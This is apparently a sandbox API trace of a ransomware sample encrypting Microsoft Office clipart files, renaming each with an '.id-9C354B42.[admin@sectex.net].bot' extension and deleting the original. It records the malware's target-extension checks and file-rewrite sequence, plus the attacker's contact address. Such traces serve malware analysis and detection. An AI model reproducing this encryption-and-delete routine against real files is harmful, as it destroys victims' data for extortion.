	[0056.700] lstrlenW (lpString=".dbf") returned 4
	[0056.700] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0056.700] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00169_.GIF") returned 63
	[0056.700] lstrlenW (lpString=".1cd") returned 4
	[0056.700] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0056.700] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00169_.GIF") returned 63
	[0056.700] lstrlenW (lpString=".jpg") returned 4
	[0056.700] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0056.700] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00169_.GIF") returned 63
	[0056.700] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00169_.GIF") returned 63
	[0056.700] lstrlenW (lpString=".doc") returned 4
	[0056.700] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0056.700] lstrlenW (lpString=".docx") returned 5
	[0056.701] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1
	[0056.701] lstrlenW (lpString=".pdf") returned 4
	[0056.701] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0056.701] lstrlenW (lpString=".xls") returned 4
	[0056.701] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0056.701] lstrlenW (lpString=".xlsx") returned 5
	[0056.701] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1
	[0056.701] lstrlenW (lpString=".ppt") returned 4
	[0056.701] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0056.701] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00169_.GIF") returned 63
	[0056.701] lstrlenW (lpString=".zip") returned 4
	[0056.701] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0056.701] lstrlenW (lpString=".rar") returned 4
	[0056.701] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0056.701] lstrlenW (lpString=".bz2") returned 4
	[0056.701] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0056.701] lstrlenW (lpString=".7z") returned 3
	[0056.701] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0056.701] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00169_.GIF") returned 63
	[0056.701] lstrlenW (lpString=".dbf") returned 4
	[0056.701] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0056.701] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00169_.GIF") returned 63
	[0056.701] lstrlenW (lpString=".1cd") returned 4
	[0056.701] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0056.701] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00169_.GIF") returned 63
	[0056.701] lstrlenW (lpString=".jpg") returned 4
	[0056.701] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0056.701] lstrcmpiW (lpString1=".GIF", lpString2=".bot") returned 1
	[0056.701] lstrlenW (lpString="AG00170_.GIF") returned 12
	[0056.701] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00170_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00170_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c
	[0056.702] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0xa19ff1c | out: lpFileSize=0xa19ff1c*=9248) returned 1
	[0056.702] CloseHandle (hObject=0x21c) returned 1
	[0056.702] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00170_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00170_.gif")) returned 0x20
	[0056.702] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00170_.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00170_.gif.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0056.702] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00170_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00170_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c
	[0056.702] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0056.702] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0056.702] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00170_.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00170_.gif.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x23c
	[0056.703] GetLastError () returned 0x0
	[0056.703] ReadFile (in: hFile=0x21c, lpBuffer=0xad80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa19fed4, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesRead=0xa19fed4*=0x2420, lpOverlapped=0x0) returned 1
	[0056.705] WriteFile (in: hFile=0x23c, lpBuffer=0xad80020*, nNumberOfBytesToWrite=0x2430, lpNumberOfBytesWritten=0xa19fc9c, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesWritten=0xa19fc9c*=0x2430, lpOverlapped=0x0) returned 1
	[0056.706] ReadFile (in: hFile=0x21c, lpBuffer=0xad80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa19fed4, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesRead=0xa19fed4*=0x0, lpOverlapped=0x0) returned 1
	[0056.706] WriteFile (in: hFile=0x23c, lpBuffer=0xad80020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa19fc9c, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesWritten=0xa19fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0056.706] SetEndOfFile (hFile=0x23c) returned 1
	[0056.706] CloseHandle (hObject=0x23c) returned 1
	[0056.706] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0056.706] SetEndOfFile (hFile=0x21c) returned 1
	[0056.707] CloseHandle (hObject=0x21c) returned 1
	[0056.707] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00170_.GIF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0056.707] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00170_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00170_.gif")) returned 1
	[0056.707] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00170_.GIF") returned 63
	[0056.707] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00170_.GIF") returned 63
	[0056.707] lstrlenW (lpString=".doc") returned 4
	[0056.707] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0056.707] lstrlenW (lpString=".docx") returned 5
	[0056.708] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1
	[0056.708] lstrlenW (lpString=".pdf") returned 4
	[0056.708] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0056.708] lstrlenW (lpString=".xls") returned 4
	[0056.708] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0056.708] lstrlenW (lpString=".xlsx") returned 5
	[0056.708] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1
	[0056.708] lstrlenW (lpString=".ppt") returned 4
	[0056.708] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0056.708] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00170_.GIF") returned 63
	[0056.708] lstrlenW (lpString=".zip") returned 4
	[0056.708] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0056.708] lstrlenW (lpString=".rar") returned 4
	[0056.708] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0056.708] lstrlenW (lpString=".bz2") returned 4
	[0056.708] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0056.708] lstrlenW (lpString=".7z") returned 3
	[0056.708] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0056.708] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00170_.GIF") returned 63
	[0056.708] lstrlenW (lpString=".dbf") returned 4
	[0056.708] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0056.708] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00170_.GIF") returned 63
	[0056.708] lstrlenW (lpString=".1cd") returned 4
	[0056.708] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0056.708] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00170_.GIF") returned 63
	[0056.708] lstrlenW (lpString=".jpg") returned 4
	[0056.708] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0056.708] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00170_.GIF") returned 63
	[0056.708] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00170_.GIF") returned 63
	[0056.708] lstrlenW (lpString=".doc") returned 4
	[0056.708] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0056.708] lstrlenW (lpString=".docx") returned 5
	[0056.708] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1
	[0056.708] lstrlenW (lpString=".pdf") returned 4
	[0056.709] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0056.709] lstrlenW (lpString=".xls") returned 4
	[0056.709] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0056.709] lstrlenW (lpString=".xlsx") returned 5
	[0056.709] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1
	[0056.709] lstrlenW (lpString=".ppt") returned 4
	[0056.709] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0056.709] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00170_.GIF") returned 63
	[0056.709] lstrlenW (lpString=".zip") returned 4
	[0056.709] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0056.709] lstrlenW (lpString=".rar") returned 4
	[0056.709] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0056.709] lstrlenW (lpString=".bz2") returned 4
	[0056.709] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0056.709] lstrlenW (lpString=".7z") returned 3
	[0056.709] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0056.709] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00170_.GIF") returned 63
	[0056.709] lstrlenW (lpString=".dbf") returned 4
	[0056.709] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0056.709] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00170_.GIF") returned 63
	[0056.709] lstrlenW (lpString=".1cd") returned 4
	[0056.709] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0056.709] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00170_.GIF") returned 63
	[0056.709] lstrlenW (lpString=".jpg") returned 4
	[0056.709] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0056.709] lstrcmpiW (lpString1=".GIF", lpString2=".bot") returned 1
	[0056.709] lstrlenW (lpString="AG00171_.GIF") returned 12
	[0056.709] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00171_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00171_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c
	[0056.710] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0xa19ff1c | out: lpFileSize=0xa19ff1c*=5016) returned 1
	[0056.710] CloseHandle (hObject=0x21c) returned 1
	[0056.710] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00171_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00171_.gif")) returned 0x20
	[0056.710] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00171_.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00171_.gif.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0056.710] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00171_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00171_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c
	[0056.710] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0056.710] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0056.710] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00171_.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00171_.gif.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x23c
	[0056.710] GetLastError () returned 0x0
	[0056.710] ReadFile (in: hFile=0x21c, lpBuffer=0xad80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa19fed4, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesRead=0xa19fed4*=0x1398, lpOverlapped=0x0) returned 1
	[0056.852] WriteFile (in: hFile=0x23c, lpBuffer=0xad80020*, nNumberOfBytesToWrite=0x13a0, lpNumberOfBytesWritten=0xa19fc9c, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesWritten=0xa19fc9c*=0x13a0, lpOverlapped=0x0) returned 1
	[0056.854] ReadFile (in: hFile=0x21c, lpBuffer=0xad80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa19fed4, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesRead=0xa19fed4*=0x0, lpOverlapped=0x0) returned 1
	[0056.854] WriteFile (in: hFile=0x23c, lpBuffer=0xad80020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa19fc9c, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesWritten=0xa19fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0056.854] SetEndOfFile (hFile=0x23c) returned 1
	[0057.762] CloseHandle (hObject=0x23c) returned 1
	[0057.762] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0057.762] SetEndOfFile (hFile=0x21c) returned 1
	[0057.763] CloseHandle (hObject=0x21c) returned 1
	[0057.763] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00171_.GIF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0057.763] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00171_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00171_.gif")) returned 1
	[0057.908] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00171_.GIF") returned 63
	[0057.908] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00171_.GIF") returned 63
	[0057.908] lstrlenW (lpString=".doc") returned 4
	[0057.908] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0057.908] lstrlenW (lpString=".docx") returned 5
	[0057.908] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1
	[0057.908] lstrlenW (lpString=".pdf") returned 4
	[0057.908] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0057.908] lstrlenW (lpString=".xls") returned 4
	[0057.908] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0057.908] lstrlenW (lpString=".xlsx") returned 5
	[0057.908] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1
	[0057.908] lstrlenW (lpString=".ppt") returned 4
	[0057.908] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0057.908] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00171_.GIF") returned 63
	[0057.908] lstrlenW (lpString=".zip") returned 4
	[0057.908] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0057.908] lstrlenW (lpString=".rar") returned 4
	[0057.908] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0057.908] lstrlenW (lpString=".bz2") returned 4
	[0057.908] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0057.908] lstrlenW (lpString=".7z") returned 3
	[0057.908] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0057.908] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00171_.GIF") returned 63
	[0057.908] lstrlenW (lpString=".dbf") returned 4
	[0057.908] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0057.908] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00171_.GIF") returned 63
	[0057.908] lstrlenW (lpString=".1cd") returned 4
	[0057.908] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0057.908] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00171_.GIF") returned 63
	[0057.908] lstrlenW (lpString=".jpg") returned 4
	[0057.908] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0057.909] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00171_.GIF") returned 63
	[0057.909] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00171_.GIF") returned 63
	[0057.909] lstrlenW (lpString=".doc") returned 4
	[0057.909] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0057.909] lstrlenW (lpString=".docx") returned 5
	[0057.909] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1
	[0057.909] lstrlenW (lpString=".pdf") returned 4
	[0057.909] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0057.909] lstrlenW (lpString=".xls") returned 4
	[0057.909] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0057.909] lstrlenW (lpString=".xlsx") returned 5
	[0057.909] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1
	[0057.909] lstrlenW (lpString=".ppt") returned 4
	[0057.909] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0057.909] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00171_.GIF") returned 63
	[0057.909] lstrlenW (lpString=".zip") returned 4
	[0057.909] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0057.909] lstrlenW (lpString=".rar") returned 4
	[0057.909] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0057.909] lstrlenW (lpString=".bz2") returned 4
	[0057.909] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0057.909] lstrlenW (lpString=".7z") returned 3
	[0057.909] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0057.909] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00171_.GIF") returned 63
	[0057.909] lstrlenW (lpString=".dbf") returned 4
	[0057.909] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0057.909] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00171_.GIF") returned 63
	[0057.909] lstrlenW (lpString=".1cd") returned 4
	[0057.909] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0057.909] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00171_.GIF") returned 63
	[0057.909] lstrlenW (lpString=".jpg") returned 4
	[0057.909] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0057.910] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0057.910] lstrlenW (lpString="AN00965_.WMF") returned 12
	[0057.910] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00965_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00965_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c
	[0057.910] GetFileSizeEx (in: hFile=0x20c, lpFileSize=0xa19ff1c | out: lpFileSize=0xa19ff1c*=7072) returned 1
	[0057.910] CloseHandle (hObject=0x20c) returned 1
	[0057.910] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00965_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00965_.wmf")) returned 0x20
	[0057.910] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00965_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00965_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0057.910] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00965_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00965_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c
	[0057.910] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0057.910] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0057.910] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00965_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00965_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190
	[0057.911] GetLastError () returned 0x0
	[0057.911] ReadFile (in: hFile=0x20c, lpBuffer=0xad80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa19fed4, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesRead=0xa19fed4*=0x1ba0, lpOverlapped=0x0) returned 1
	[0057.940] WriteFile (in: hFile=0x190, lpBuffer=0xad80020*, nNumberOfBytesToWrite=0x1bb0, lpNumberOfBytesWritten=0xa19fc9c, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesWritten=0xa19fc9c*=0x1bb0, lpOverlapped=0x0) returned 1
	[0057.952] ReadFile (in: hFile=0x20c, lpBuffer=0xad80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa19fed4, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesRead=0xa19fed4*=0x0, lpOverlapped=0x0) returned 1
	[0057.952] WriteFile (in: hFile=0x190, lpBuffer=0xad80020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa19fc9c, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesWritten=0xa19fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0057.952] SetEndOfFile (hFile=0x190) returned 1
	[0058.365] CloseHandle (hObject=0x190) returned 1
	[0058.482] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0058.482] SetEndOfFile (hFile=0x20c) returned 1
	[0058.533] CloseHandle (hObject=0x20c) returned 1
	[0058.533] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00965_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0058.533] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00965_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00965_.wmf")) returned 1
	[0058.534] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00965_.WMF") returned 63
	[0058.534] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00965_.WMF") returned 63
	[0058.534] lstrlenW (lpString=".doc") returned 4
	[0058.534] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0058.534] lstrlenW (lpString=".docx") returned 5
	[0058.534] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0058.534] lstrlenW (lpString=".pdf") returned 4
	[0058.534] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0058.534] lstrlenW (lpString=".xls") returned 4
	[0058.534] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0058.534] lstrlenW (lpString=".xlsx") returned 5
	[0058.534] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0058.534] lstrlenW (lpString=".ppt") returned 4
	[0058.534] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0058.534] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00965_.WMF") returned 63
	[0058.534] lstrlenW (lpString=".zip") returned 4
	[0058.534] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0058.534] lstrlenW (lpString=".rar") returned 4
	[0058.534] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0058.534] lstrlenW (lpString=".bz2") returned 4
	[0058.534] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0058.534] lstrlenW (lpString=".7z") returned 3
	[0058.534] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0058.534] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00965_.WMF") returned 63
	[0058.534] lstrlenW (lpString=".dbf") returned 4
	[0058.534] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0058.534] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00965_.WMF") returned 63
	[0058.534] lstrlenW (lpString=".1cd") returned 4
	[0058.534] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
